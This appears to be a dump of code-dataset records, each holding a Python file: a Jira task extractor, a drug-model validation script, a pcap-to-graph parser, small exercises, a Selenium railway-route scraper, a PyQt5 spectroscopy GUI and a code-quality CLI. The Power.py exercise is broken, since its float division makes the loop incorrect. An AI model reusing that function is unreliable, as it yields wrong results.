_get_project_or_raise_exception(self, input_line):\n try:\n return input_line['tmpl_ext']['project']['key']\n except KeyError:\n if 'project' in self.default_params:\n return self.default_params['project']['key']\n else:\n raise TaskExtractorTemplateErrorProject('Missing project key in line: ' + input_line['summary'] \\\n + '.\\nYou should add \\'{\"project\": {\"key\": \"JIRA\"}}\\' to the template, where \"JIRA\" must be replaced by your real project key.')\n\n def _validate_user(self, user, project):\n \"\"\"\n Checks if a new issue of the project can be assigned to the user.\n http://docs.atlassian.com/jira/REST/latest/#id120417\n \"\"\"\n\n# print self.jira.search_assignable_users_for_issues('admi', project=project)\n\n# full_url = \"user/assignable/search?username={0}&project={1}\".format(user, project)\n# try:\n# self.jira.get('user/assignable/search', username=user, project=project)\n# except JiraConnectActionError, e:\n# if e.code == 403 or e.code == 401:\n# error_message = \"Your username and password are not accepted by Jira.\"\n# raise TaskExtractorJiraValidationError(error_message)\n# else:\n# raise TaskExtractorJiraValidationError(e.message)\n# try:\n# res = self._jira_request(full_url, None, 'GET')\n# print res\n# result = json.loads(res)\n# except URLError, e:\n# if hasattr(e, 'code'):\n# if e.code == 403 or e.code == 401:\n# error_message = \"Your username and password are not accepted by Jira.\"\n# raise TaskExtractorJiraValidationError(error_message)\n# else:\n# error_message = \"The username '%s' and the project '%s' can not be validated.\\nJira response: Error %s, %s\" % (user, project, e.code, full_url) #e.read())\n# raise TaskExtractorJiraValidationError(error_message)\n# elif hasattr(e, 'reason'):\n## error_message = \"%s: %s\" % (e.reason, self.jira_url)\n# raise TaskExtractorJiraHostProblem(error_message)\n# if len(result) == 0: # the project is okay but username is missing n Jira\n# error_message = \"ERROR: the username '%s' specified in template can not be validated.\" % user\n# raise TaskExtractorJiraValidationError(error_message)\n\n\n# end of load() helpers\n###############################################################################\n\n def load(self, fd):\n \"\"\"Load templates from files.\n\n Args:\n fd (): template file.\n\n Returns:\n list: TODO: describe format.\n \"\"\"\n return load(fd)\n\n def jira_format(self, task):\n fields = {}\n\n fields.update(self.default_params)\n if 'tmpl_ext' in task:\n fields.update(task['tmpl_ext'])\n if 'duedate' in task:\n fields['duedate'] = task['duedate']\n fields['summary'] = task['summary']\n if 'description' in task:\n fields['description'] = task['description']\n fields['issuetype'] = {'name': task['issuetype']}\n fields['assignee'] = {'name': task['assignee']}\n if 'parent' in task:\n fields['parent'] = {'key': task['parent']}\n\n return fields\n\n def create_tasks(self, task_list):\n \"\"\"\n It takes the task_list prepared by load(), creates all tasks\n and compose created tasks summary.\n \"\"\"\n\n summary = []\n args = {}\n actions = {\n 'h4.': self._create_h4_task,\n '..': self._attach_h4_task,\n 'h5.': self._create_h5_task,\n '...': self._attach_existing_h5_task,\n '(-)': self._create_sub_task,\n '#': self._create_sub_task,\n '#*': self._create_sub_task\n }\n\n for line in task_list:\n if 'markup' in line:\n if 'description' in line:\n line['description'] = \\\n self._replace_realtime_vars(line['description'])\n summary.extend(actions[line['markup']](line, args))\n elif 'text' in line:\n summary.append(line['text'])\n if 'h5_task_desc' in args:\n args['h5_task_desc'].append(line['text'])\n\n if 'h5_task_key' in args:\n self._h5_task_completion(args)\n\n for link in self.links:\n self.create_link(self._replace_realtime_vars(link['inward']),\n self._replace_realtime_vars(link['outward']),\n link['type'])\n\n return '\\n'.join(summary)\n\n# ###################################################################################\n# several helpers for create_tasks()\n\n def _make_task_caption(self, task_json, task_key):\n return u' '.join([\n task_json['markup'],\n task_json['summary'], '(' + task_key + ')'])\n\n def _h5_task_completion(self, args):\n desc = ''\n len_args = len(args['h5_task_desc'])\n if len_args > 0:\n desc = self._replace_realtime_vars('\\n'.join(args['h5_task_desc']))\n if len_args > args['h5_task_desc_len']:\n self.update_issue_desc(args.get('h5_task_key'), desc)\n args.pop('h5_task_key', None)\n args.pop('h5_task_desc', None)\n return desc\n\n def _create_sub_task(self, task_json, args):\n task_json['parent'] = \\\n args.get('h5_task_key') or args.get('h4_task_key')\n task_key = self.create_issue(task_json)\n desc = self._make_task_caption(task_json, task_key)\n if 'h5_task_key' in args:\n args['h5_task_desc'].append(desc)\n return [desc]\n\n def _create_h5_task(self, task_json, args):\n if 'h5_task_key' in args: # if new h5 task begins\n self._h5_task_completion(args)\n key = self.create_issue(task_json)\n args['h5_task_key'] = key\n args['h5_task_desc'] = []\n if 'description' in task_json:\n args['h5_task_desc'].append(task_json['description'])\n args['h5_task_desc_len'] = len(args['h5_task_desc'])\n if args.get('h4_task_key') is not None:\n self.create_link(args.get('h4_task_key'), key)\n desc = [self._make_task_caption(task_json, key)]\n desc.extend(args['h5_task_desc'])\n return desc\n\n def _attach_existing_h5_task(self, task_json, args):\n if 'h5_task_key' in args: # if new h5 task begins\n self._h5_task_completion(args)\n key = task_json['issue_key']\n args['h5_task_key'] = key\n if 'h4_task_key' in args:\n self.create_link(args['h4_task_key'], key)\n args['h5_task_desc'] = [task_json['description']] \\\n if 'description' in task_json else []\n args['h5_task_desc_len'] = len(args['h5_task_desc'])\n desc = [u' '.join((task_json['markup'], key))]\n desc.extend(args['h5_task_desc'])\n return desc\n\n def _create_h4_task(self, task_json, args):\n args['h4_task_key'] = self.create_issue(task_json)\n return [self._make_task_caption(task_json, args['h4_task_key'])]\n\n def _attach_h4_task(self, task_json, args):\n args['h4_task_key'] = task_json['issue_key']\n return [u'.. ' + task_json['issue_key']]\n\n# end of create_tasks() helpers\n# ###################################################################################\n\n def create_issue(self, issue):\n if ('description' in issue) and self.rt_vars:\n issue['description'] = \\\n self._replace_realtime_vars(issue['description'])\n issue_id = self._create_issue_http(issue)\n if 'rt_ext' in issue:\n self._add_runtime_variable(issue['rt_ext'], issue_id)\n if 'link' in issue:\n self._add_link_info(issue_id, issue['link'])\n return issue_id\n\n def _add_link_info(self, issue_id, link_pattern):\n m = re.match('([A-Z]+-\\d+|\\$\\w+)\\|(.+)', link_pattern)\n if m:\n self.links.append({'inward': m.group(1),\n 'type': m.group(2),\n 'outward': issue_id})\n m = re.match('(.+)\\|([A-Z]+-\\d+|\\$\\w+)', link_pattern)\n if m:\n self.links.append({'inward': issue_id,\n 'type': m.group(1),\n 'outward': m.group(2)})\n m = re.match('^([A-Z]+-\\d+|\\$\\w+)$', link_pattern)\n if m:\n self.links.append({'inward': issue_id,\n 'type': 'Relates',\n 'outward': m.group(1)})\n # TODO: check if there is no match\n\n def _add_runtime_variable(self, name, value):\n self.rt_vars.update({name: value})\n self.rt_vars_regex = \\\n re.compile(\"\\$(\" + \"|\".join(map(re.escape,\n sorted(self.rt_vars.keys(), reverse=True))) + \")\")\n\n def _replace_realtime_vars(self, desc):\n return self.rt_vars_regex.sub(\n lambda match: self.rt_vars[match.group(1)], desc) \\\n if self.rt_vars else desc\n\n def _create_issue_http(self, issue):\n \"\"\"\n Invoke JIRA HTTP API to create issue\n \"\"\"\n\n if not self.dry_run:\n try:\n jira_issue = self.jira.create_issue(\n fields=self.jira_format(issue))\n if 'watchers' in issue:\n for w in issue['watchers']:\n self.jira.add_watcher(jira_issue, w)\n return jira_issue.key\n except JIRAError as e:\n error_message = (\"Can't create task in the line {0} of your \"\n \"template.\\nJIRA error: {1}\").\\\n format(issue['line_number'], e.text)\n raise TaskExtractorJiraValidationError(error_message)\n else:\n return 'DRYRUN-1234'\n\n def create_link(self, inward_issue, outward_issue, link_type='Relates'):\n \"\"\"Creates an issue link between two issues.\n\n The specified link type in the request is used to create the link\n and will create a link from the inward_issue to the outward_issue.\n The list of issue types can be retrieved using rest/api/2/issueLinkType\n \"\"\"\n\n if not self.dry_run:\n issue1 = self.jira.issue(inward_issue)\n issue2 = self.jira.issue(outward_issue)\n self.jira.create_issue_link(link_type, issue1, issue2)\n else:\n return 'dry run'\n\n def update_issue_desc(self, issue_key, issue_desc):\n if not self.dry_run:\n self.jira.issue(issue_key).update(\n description=issue_desc)\n else:\n return 'dry run'\n","sub_path":"jirabulkloader/task_extractor.py","file_name":"task_extractor.py","file_ext":"py","file_size_in_byte":12410,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"582285992","text":"from sklearn.externals import joblib\nfrom sklearn import preprocessing\nfrom scipy.stats import spearmanr\nimport numpy as np\nimport pandas as pd\nimport os\n\n\n# load different models\nmodel_list = os.listdir(\"..//..//02_drug_model//prot_model//\")\nmodel_list = sorted(model_list)\n\n\ncounter = 1\nfor model in model_list:\n print(counter)\n validation_drug_prot = model.replace(\"_model_MACCS_properties\", \"\")\n\n # load drug info data (for standardization)\n all_df = pd.read_csv(\"..//..//01_raw_data//05_all_drug_info.txt\", sep=\"\\t\", header=None, lineterminator=\"\\n\")\n all_properties = np.array(list(all_df[all_df.columns[-1]].apply(lambda x: x[1:-1].replace(\"[\", \"\").replace(\"]\", \"\").split(\",\"))))\n scaler = preprocessing.StandardScaler().fit(all_properties)\n\n # load drugs\n df = pd.read_csv(\"..//..//02_drug_model//drug_per_prot//\" + validation_drug_prot + \".txt\", sep=\"\\t\", header=None, lineterminator=\"\\n\")\n MACCS = np.array(list(df[df.columns[-2]].apply(lambda x: x[1:-1].replace(\"[\", \"\").replace(\"]\", \"\").split(\",\"))))\n properties = np.array(list(df[df.columns[-1]].apply(lambda x: x[1:-1].replace(\"[\", \"\").replace(\"]\", \"\").split(\",\"))))\n Ki = np.array(list(df[df.columns[3]]))\n\n # data standardization\n properties = scaler.transform(properties)\n MACCS_properties = np.array(np.append(MACCS, properties, axis=1))\n\n x_test = MACCS_properties\n y_test = Ki\n\n # use different models except validation_model\n validation_predict = []\n\n with open(\".//result//predicted_\" + validation_drug_prot + \"_drugs_w_all_model_scc.txt\", \"w\") as o1:\n print(\"drug numbers =\", len(y_test), file=o1)\n print(\"Prot_model_compared\", \"SCC_of_predicted_ki\", \"p_value\", sep=\"\\t\", file=o1)\n\n SVR_linear = joblib.load(\"..//..//02_drug_model//prot_model//\" + model)\n result = SVR_linear.predict(x_test)\n validation_predict = list(result)\n\n for other_model in model_list:\n if validation_drug_prot in other_model:\n pass\n else:\n SVR_linear = joblib.load(\"..//..//02_drug_model//prot_model//\" + other_model)\n result = SVR_linear.predict(x_test)\n y_pred = list(result)\n scc, pval = spearmanr(validation_predict, y_pred)\n print(other_model.replace(\"_model_MACCS_properties\", \"\"), scc, pval, sep=\"\\t\", file=o1)\n\n counter += 1\n","sub_path":"03_val_predict_drug_betw_model/01_drug_validation.py","file_name":"01_drug_validation.py","file_ext":"py","file_size_in_byte":2396,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"275284856","text":"import dpkt \nfrom dpkt.compat import compat_ord\nimport os, sys\nimport socket\nimport binascii\nimport json\n\n\nfile = open('20110413_pcap_1.pcap', 'rb')\n#ip:mac\noutput_string = \"edges: [\"\n\nbinetflow = {}\nip_macs = {}\npackets = dpkt.pcap.Reader(file)\n\ndef mac_addr(address):\n return ':'.join('%02x' % compat_ord(b) for b in address)\n\nfor ts, buf in packets:\n\n eth = dpkt.ethernet.Ethernet(buf)\n if isinstance(eth.data, dpkt.ip.IP):\n ip = eth.data\n src = socket.inet_ntoa(ip.src)\n dst = socket.inet_ntoa(ip.dst)\n mac = mac_addr(eth.src)\n \n output_string += '{ source: {id: ' + src + ', label: \"' + src + '\"}, target: {id: ' + dst + ', label: \"'+dst+'\"},value: \"Test\" },'\n \n\noutput_string += \"]}\"\nprint(json.dumps(ip_macs))\noutput = open(\"vis\", \"w\")\noutput.write(output_string)\noutput.close()","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":844,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"74207724","text":"def power(value, ipow):\n result = 1\n while (ipow > 0):\n if ipow % 2 == 1:\n result *= value\n value *= value\n ipow /= 2\n return result\n\na = int(input())\np = int(input())\nprint(power(a, p))\n\n","sub_path":"Week7_Множества_и_словари_Sets_and_Dictionaries/Power.py","file_name":"Power.py","file_ext":"py","file_size_in_byte":233,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"618379439","text":"# with open(\"test_input.txt\", \"r\") as f:\n# with open(\"test_input2.txt\", \"r\") as f:\nwith open(\"input.txt\", \"r\") as f:\n f = f.read().splitlines()\n\ntarget = 30000000\nstart = list(map(int, f[0].split(\",\")))\n\nlast = {v: i+1 for i, v in enumerate(start)}\n\ncurrent = 0\n\nfor i in range(len(start)):\n print(i, start[i])\n\nfor i in range(len(start)+1, target):\n # print(i, current)\n if current in last:\n new_current = i - last[current]\n last[current] = i\n current = new_current\n else:\n last[current] = i\n current = 0\n\nprint(current)\n\n","sub_path":"15/solution_2.py","file_name":"solution_2.py","file_ext":"py","file_size_in_byte":573,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"105340730","text":"\nfrom __future__ import unicode_literals\nimport sys\nimport os\nimport random\nimport time\n\nimport numpy as np\nfrom numpy import arange, sin, pi\n\nimport scipy\nimport scipy.signal\nimport matplotlib.pyplot as plt\n\nfrom openpyxl import Workbook\nfrom openpyxl import load_workbook\nimport als_methods as als\nimport pre as crikit\n\nfrom PyQt5 import QtCore, QtWidgets\nfrom PyQt5.QtWidgets import QInputDialog, QPushButton, QMainWindow, QApplication, QSpinBox, QLabel\nfrom PyQt5.QtWidgets import QWidget, QAction, QTabWidget,QVBoxLayout, QHBoxLayout\nfrom PyQt5.QtWidgets import QGroupBox, QDialog,QGridLayout\nfrom PyQt5.QtWidgets import QApplication, QWidget, QLineEdit, QFileDialog\n \nfrom PyQt5.QtGui import QIcon\nfrom PyQt5.QtCore import pyqtSlot\n\nimport matplotlib\n# Make sure that we are using QT5BB\nmatplotlib.use('Qt5Agg')\nfrom matplotlib.figure import Figure\nfrom matplotlib.backends.backend_qt5agg import FigureCanvasQTAgg as FigureCanvas\nfrom matplotlib.backends.backend_qt5agg import NavigationToolbar2QT as NavigationToolbar\nimport matplotlib.pyplot as plt\nimport matplotlib.animation as animation\n\n### homemade package\n\nfrom Cars_Class import CARS, KK_ALS_Spectral\n\nprogname = os.path.basename(sys.argv[0])\nprogversion = \"0.1\"\n\n\n\nclass App(QMainWindow):\n \n def __init__(self):\n super().__init__()\n self.title = 'PyQt5 tabs - pythonspot.com'\n self.left = 0\n self.top = 0\n self.width = 1000\n self.height = 800\n self.setWindowTitle(self.title)\n self.setGeometry(self.left, self.top, self.width, self.height)\n \n self.table_widget = MyTableWidget(self) # creat a Widgat.\n self.setCentralWidget(self.table_widget) # set the Widget to be CentralWidget of QMainWindow.\n \n self.show()\n\nclass MyTableWidget(QWidget): \n \n def __init__(self, parent): \n super(QWidget, self).__init__(parent)\n\n self.fileName = ''\n\n \n self.layout = QVBoxLayout(self) # create a Layout, which will be setted for self\n\n # Initialize tab screen\n self.tabs = QTabWidget()\n self.tab1 = QWidget() \n self.tab2 = QWidget()\n #self.tabs.resize(800,600) \n \n self.tabs.addTab(self.tab1,\"Tab 1\") # Add tabs\n self.tabs.addTab(self.tab2,\"Tab 2\")\n \n self.layout.addWidget(self.tabs) # Add tabs to widget\n\n self.setLayout(self.layout)\n\n self.initalUI_tab_1()\n self.initalUI_tab_2()\n\n def initalUI_tab_1(self):\n #################### Create Plot cavas widget ###################################################\n # Create first tab\n self.tab1_layout = QHBoxLayout(self) # create a Layout, which will be setted for tab_2\n\n self.tab1_layout_L = QVBoxLayout(self)\n\n self.button_openBackgroundfile = QPushButton('Open Background File') # Just some button connected to `plot` method\n self.button_openBackgroundfile.clicked.connect(self.openFileNameDialog) \n self.button_openSignalfile = QPushButton('Open Signal File') # Just some button connected to `plot` method\n self.button_openSignalfile.clicked.connect(self.openFileNameDialog) \n \n self.tab1_layout_L.addWidget(self.button_openBackgroundfile)\n self.tab1_layout_L.addWidget(self.button_openSignalfile)\n\n self.tab1_layout_R = QVBoxLayout(self)\n\n self.plotUp = plt.figure(\"Background\")\n\n axes_Up = self.plotUp.add_subplot(111)\n\n self.add_plotfigure(self.plotUp, self.tab1_layout_R)\n \n self.buttonPlotUp = QPushButton('Plot') # Just some button connected to `plot` method \n self.buttonPlotUp.clicked.connect(self.test_fun(axes_Up, \"background\"))\n self.tab1_layout_R.addWidget(self.buttonPlotUp)\n\n self.plotDown = plt.figure(\"Signal\")\n axes_Down = self.plotDown.add_subplot(111)\n\n self.add_plotfigure(self.plotDown, self.tab1_layout_R)\n \n self.buttonPlotDown = QPushButton('Plot') # Just some button connected to `plot` method \n self.buttonPlotDown.clicked.connect(self.test_fun(axes_Down, \"signal\")) \n self.tab1_layout_R.addWidget(self.buttonPlotDown)\n\n\n self.tab1_layout.addLayout(self.tab1_layout_L)\n #self.tab1_layout.addStretch()\n self.tab1_layout.addLayout(self.tab1_layout_R)\n\n self.tab1.setLayout(self.tab1_layout) # set tab1.layout to be the layout of tab_1 \n\n def initalUI_tab_2(self):\n #################### Create Plot cavas widget ###################################################\n # Create first tab\n self.tab2_layout = QVBoxLayout(self) # create a Layout, which will be setted for tab_2\n\n\n self.tab2PlotUp = plt.figure(\"Background and Singal\")\n self.add_plotfigure(self.tab2PlotUp, self.tab2_layout)\n tab2Axes_Up = self.tab2PlotUp.add_subplot(111)\n\n self.tab2buttonPlotUp = QPushButton('Plot Back + Siganl') # Just some button connected to `plot` method \n self.tab2buttonPlotUp.clicked.connect(self.test_fun(tab2Axes_Up, \"Background and Singal\"))\n\n\n self.button_CARS2SPET = QPushButton('CARS --> SPET') # Just some button connected to `plot` method\n self.button_CARS2SPET.clicked.connect(self.CARS2SPET) \n \n self.tab2_layout.addWidget(self.tab2buttonPlotUp)\n self.tab2_layout.addWidget(self.button_CARS2SPET)\n\n\n self.tab2.setLayout(self.tab2_layout) # set tab1.layout to be the layout of tab_1 \n\n def openFileNameDialog(self): \n options = QFileDialog.Options()\n options |= QFileDialog.DontUseNativeDialog\n self.fileName, _ = QFileDialog.getOpenFileName(self,\"QFileDialog.getOpenFileName()\", \"\",\"All Files (*);;Python Files (*.py)\", options=options)\n if self.fileName:\n print(self.fileName)\n \n\n def test_fun(self, axes, dataName):\n\n def inner_test_fun():\n \n print(\"dataName\", dataName)\n\n # save the background data and signal data, which will be used to get the spectrume.\n if dataName == \"background\" or dataName == \"signal\":\n ## read the file that you just open\n self.readfile()\n\n if dataName == \"background\":\n #print(\"background\")\n self.background = self.dicDataNorm[\"averageIntensity\"]\n #print(self.background)\n elif dataName == \"signal\":\n #print(\"signal\")\n self.signal = self.dicDataNorm[\"averageIntensity\"]\n #print(self.signal)\n\n for key, value in self.dicDataNorm.items():\n if (key != \"wavenumber\" and key != \"wavelength\"):\n print(key)\n axes.plot(self.WN, value, label = key)\n\n elif dataName == \"Background and Singal\":\n\n axes.plot(self.WN, self.signal, label = \"signal\")\n axes.plot(self.WN, self.background, label = \"background\")\n\n pass\n \n \n axes.legend()\n axes.set_xlabel('Wavenumber (cm$^{-1}$)')\n axes.set_ylabel('Spectrum (au)')\n\n return inner_test_fun\n\n def CARS2SPET(self):\n\n self.finalPlot = plt.figure(\"CARS2SPET\")\n\n self.finalAxes = self.finalPlot.add_subplot(111)\n self.finalAxes.plot(self.backgroundData)\n\n #self.finalAxes.figure.canvas.draw()\n #plt.draw()\n\n #print(self.backgroundData)\n #print(self.signal)\n\n \n def readfile(self):\n ## read the data \n app = CARS()\n self.dicData, self.dicDataNorm = app.loadData(self.fileName)\n\n self.WN = self.dicDataNorm[\"wavenumber\"]\n averageIntensity = 0.0 * self.dicDataNorm[\"wavenumber\"]\n\n ## then plot the data\n for key, value in self.dicDataNorm.items():\n if (key != \"wavenumber\" and key != \"wavelength\"):\n averageIntensity += value\n \n # there are two list that are not the intensity data \n # dicDataNorm[\"wavenumber\"] and dicDataNorm[\"wavelength\"]\n # add the \"averageIntensity\" to dicDataNorm, which will be used to calculate the spectrum\n self.dicDataNorm[\"averageIntensity\"] = averageIntensity/(len(self.dicDataNorm) - 2)\n #print(\"averageIntensity is \", self.dicDataNorm[\"averageIntensity\"])\n\n\n #dicSignal, dicSignalNorm = app.loadData('spectra_signal.xlsx')\n #return dicBackground, dicBackgroundNorm\n \n \n def showdialog(self):\n msg = QMessageBox()\n msg.setIcon(QMessageBox.Information)\n\n msg.setText(\"This is a message box\")\n msg.setInformativeText(\"This is additional information\")\n msg.setWindowTitle(\"MessageBox demo\")\n msg.setDetailedText(\"The details are as follows:\")\n msg.setStandardButtons(QMessageBox.Ok | QMessageBox.Cancel)\n\n\n def add_plotfigure(self, figureName, plot_layout):\n #self.figureName = plt.figure() # a figure instance to plot on\n #if put \"plt.ion\" on the head, which will make two more figures idependently.\n\n # this is the Canvas Widget that displays the `figure`, it takes the `figure` instance as a parameter to __init__\n canvas_figureName = FigureCanvas(figureName)\n toolbar_figureName = NavigationToolbar(canvas_figureName, self) # this is the Navigation widget, it takes the Canvas widget and a parent\n \n plot_layout.addWidget(toolbar_figureName) # this also needed to show the Navigation of plot\n plot_layout.addWidget(canvas_figureName) # add Canvas Widget(plot widget) onto tab_2\n\n def plotFigure(self):\n app = CARS()\n app.plotPredata(self.dicBackground, self.plotUp)\n\n\n\n\nif __name__ == '__main__':\n app = QApplication(sys.argv)\n ex = App()\n print(\"the last step!\")\n sys.exit(app.exec_())\n\n","sub_path":"qt_test.py","file_name":"qt_test.py","file_ext":"py","file_size_in_byte":10229,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"185858260","text":"\"\"\"存储数据\r\n json.dump(): 存储数据,接受两个实参:要存储的数据以及可用于存储数据的文件对象。\r\n json.load()\r\n\"\"\"\r\nimport json\r\nfilename = 'favorite_number.json'\r\n\r\n\r\ndef new_f_number():\r\n try:\r\n username = input(\"Hello. What is your name?\")\r\n number_input = input(\"What is your favorite number?\")\r\n f_number = int(number_input)\r\n favorite_number = {username: f_number}\r\n with open(filename, 'a') as f_number_obj:\r\n json.dump(favorite_number, f_number_obj)\r\n return favorite_number\r\n except ValueError:\r\n print(\"What you input is not a number!\")\r\n\r\n\r\ndef get_f_number():\r\n try:\r\n with open(filename) as f_number_obj:\r\n data = json.load(f_number_obj)\r\n except FileNotFoundError:\r\n return new_f_number()\r\n else:\r\n return data\r\n\r\n\r\ndef greet_user():\r\n name = input(\"What is your name?\")\r\n flag = True\r\n for username in get_f_number().keys():\r\n if username == name:\r\n print(username + \", I know your favorite number is \" + str(get_f_number()[username]))\r\n flag = False\r\n break\r\n if flag:\r\n print(\"you are new here.\")\r\n\r\n\r\ndef main():\r\n greet_user()\r\n pass\r\n\r\n\r\nif __name__ == '__main__':\r\n main()","sub_path":"python_work/chapter_10/practice_10.5.py","file_name":"practice_10.5.py","file_ext":"py","file_size_in_byte":1309,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"317306810","text":"'''\nCreated on Feb 5, 2015\n\n@author: Asif\n'''\n\nfrom selenium import webdriver\n#from selenium.webdriver.common.keys import Keys\n#from bs4 import BeautifulSoup\n#import re\n#All the required Libraries are imported\n\n#Using PhantomJS which does not open a browser which reduces potentially\n# a great amount of time\ndriver = webdriver.PhantomJS(\"C:\\\\Users\\\\Asif\\\\Desktop\\\\phantomjs-2.0.0-windows\\\\bin\\\\phantomjs.exe\")\n\ndef go(stn1,stn2):\n #Prepare the Selenium to handle alerts\n \n #Removing the redundant Characters in the output\n #regex = re.compile(r'[\\r\\n\\t\\\\n\\\\t]')\n\n #Get the Driver Class\n driver.get(\"http://rbs.indianrail.gov.in/ShortPath/ShortPath.jsp\")\n\n #Fill the Source and Destination entries\n element = driver.find_element_by_name(\"srcCode\")\n element.send_keys(stn1)\n element = driver.find_element_by_name(\"destCode\")\n element.send_keys(stn2)\n\n #Submit the form\n driver.find_element_by_name(\"findPath0\").click()\n\n #Get the total number of links\n #total_links = len(re.findall(' SHA to analyze (required)\n --project Project name to use (required)\n --min-quality-score Code Quality Score from 0 to 100 (optional)\n --min-quality-grade Minimum Code Grade EXCELLENT, GOOD, NEUTRAL, WARNING, CRITICAL (optional)\n --max-defects-rate Max rate of defect per sloc (optional)\n --max-complex-functions-rate Max rate of complex functions in the total number of functions (optional)\n --max-long-functions-rate Max rate of long functions in the total number of functions (optional)\n --max-timeout-sec Maximum time to wait before the analysis is done (in secs). Default to 600.\nExample:\n $ code-inspector-check-quality -p \"MY SUPER PROJECT\" --min-quality-score 90\n\"\"\"\n\nimport os\nimport json\nimport logging\nimport sys\nimport time\n\nimport docopt\nfrom code_inspector.common import is_grade_lower\nfrom code_inspector.constants import DEFAULT_TIMEOUT\n\nfrom .graphql.common import do_graphql_query\nfrom .version import __version__\n\nlogging.basicConfig()\n\nlog = logging.getLogger('code-inspector')\n\n\ndef start_analysis(access_key, secret_key, token, actor, repository, sha, ref, project_name):\n \"\"\"\n Get the project information with the latest analysis data using the project name\n :param access_key: the access key to the GraphQL API\n :param secret_key: the secret key to the GraphQL API\n :param token: the token to use to analyze the project (used to checkout the repository).\n :param actor: GitHub username that initiated the request\n :param repository: GitHub repository name.\n :param sha: SHA to analyze\n :param ref: ref to analyze (branch or tag)\n :param project_name: name of the project\n :return: the project identifier or None is exception or non-existent project.\n \"\"\"\n args = []\n if project_name is not None and len(project_name) > 0:\n args.append(\"projectName: \\\"\" + project_name + \"\\\"\")\n if ref is not None and len(ref) > 0:\n args.append(\"ref: \\\"\" + ref + \"\\\"\")\n args.append(\"token: \\\"\" + token + \"\\\"\")\n args.append(\"actor: \\\"\" + actor + \"\\\"\")\n args.append(\"repositoryName: \\\"\" + repository + \"\\\"\")\n args.append(\"sha: \\\"\" + sha + \"\\\"\")\n args_string = \",\".join(args)\n query = \"\"\"mutation {githubAction(\"\"\" + args_string + \"\"\"){id}}\"\"\"\n response_json = do_graphql_query(access_key, secret_key, {\"query\": query})\n\n if not response_json:\n return None\n\n return response_json['githubAction']\n\n\ndef get_analysis_by_revision(access_key, secret_key, project_name, revision):\n \"\"\"\n Get an analysis using its ID\n :param access_key: access key to poll the API\n :param secret_key: secret key to poll the API\n :param project_name: name of the project to analyze\n :param revision: the revision to analyze\n :return: the return code depending on the results or some processing error\n \"\"\"\n\n query = \"\"\"\n {\n project(name: \\\"\"\"\" + project_name + \"\"\"\\\") {\n analyses(revision: \\\"\"\"\" + revision + \"\"\"\\\", howmany: 1, skip: 0) {\n id\n status\n slocs\n techdebt{\n grade\n score\n }\n summary{\n duplicates\n violations\n duplicated_lines\n longFunctions\n totalFunctions\n complexFunctions\n }\n }\n }\n }\n \"\"\"\n response_json = do_graphql_query(access_key, secret_key, {\"query\": query})\n logging.info(\"Analysis response %s\", response_json)\n return response_json['project']\n\n\ndef main(argv=None):\n \"\"\"\n Main function that makes the magic happen.\n :param argv:\n :return:\n \"\"\"\n options = docopt.docopt(__doc__, argv=argv, version=__version__)\n sha = options['--sha']\n project_name = options['--project']\n min_quality_score_argument = options['--min-quality-score']\n min_quality_grade_argument = options['--min-quality-grade']\n max_defects_rate_argument = options['--max-defects-rate']\n max_complex_functions_rate_argument = options['--max-complex-functions-rate']\n max_long_functions_rate_argument = options['--max-long-functions-rate']\n custom_timeout_sec = options['--max-timeout-sec']\n\n try:\n timeout = int(custom_timeout_sec) if custom_timeout_sec is not None else DEFAULT_TIMEOUT\n except ValueError:\n timeout = DEFAULT_TIMEOUT\n\n if timeout == 0:\n timeout = DEFAULT_TIMEOUT\n\n log.addHandler(logging.StreamHandler())\n\n log.setLevel(logging.INFO)\n\n log.info(\"Invoking code-inspector-check-quality with the following parameters\")\n log.info(\" (parameters) \")\n log.info(\"sha: %s\", sha)\n log.info(\"project_name: %s\", project_name)\n log.info(\"min_quality_score_argument: %s\", min_quality_score_argument)\n log.info(\"min_quality_grade_argument: %s\", min_quality_grade_argument)\n log.info(\"max_defects_rate_argument: %s\", max_defects_rate_argument)\n log.info(\"max_complex_functions_rate_argument: %s\", max_complex_functions_rate_argument)\n log.info(\"max_long_functions_rate_argument: %s\", max_long_functions_rate_argument)\n log.info(\"custom_timeout_sec: %s\", custom_timeout_sec)\n log.info(\" (starting) \")\n\n try:\n access_key = os.environ.get('CODE_INSPECTOR_ACCESS_KEY')\n secret_key = os.environ.get('CODE_INSPECTOR_SECRET_KEY')\n\n if not access_key:\n log.info('CODE_INSPECTOR_ACCESS_KEY environment variable not defined!')\n sys.exit(1)\n\n if not secret_key:\n log.info('CODE_INSPECTOR_SECRET_KEY not defined!')\n sys.exit(1)\n\n if not project_name:\n log.info('Project name not defined')\n sys.exit(1)\n\n if not sha:\n log.info('GitHub SHA required')\n sys.exit(1)\n\n # Filter argument and bad values.\n if min_quality_score_argument is not None:\n min_quality_score = int(min_quality_score_argument)\n else:\n min_quality_score = None\n\n if max_defects_rate_argument is not None:\n max_defects_rate = float(max_defects_rate_argument)\n else:\n max_defects_rate = None\n\n if max_complex_functions_rate_argument is not None:\n max_complex_functions_rate = float(max_complex_functions_rate_argument)\n else:\n max_complex_functions_rate = None\n\n if max_long_functions_rate_argument is not None:\n max_long_functions_rate = float(max_long_functions_rate_argument)\n else:\n max_long_functions_rate = None\n\n deadline = time.time() + timeout\n\n while True:\n now = time.time()\n if now > deadline:\n log.error(\"Deadline expired\")\n sys.exit(1)\n\n poll_analysis = None\n project = get_analysis_by_revision(access_key, secret_key, project_name, sha)\n analysis_complete = False\n if project['analyses'] and len(project['analyses']) > 0:\n poll_analysis = project['analyses'][0]\n status = poll_analysis['status']\n if status.upper() in [\"DONE\", \"ERROR\", \"SAME_REVISION\"]:\n poll_analysis = project['analyses'][0]\n analysis_complete = True\n if not analysis_complete:\n log.debug(\"analysis not completed yet\")\n time.sleep(5)\n continue\n\n print(json.dumps(poll_analysis, indent=4))\n\n analysis_slocs = int(poll_analysis['slocs'])\n 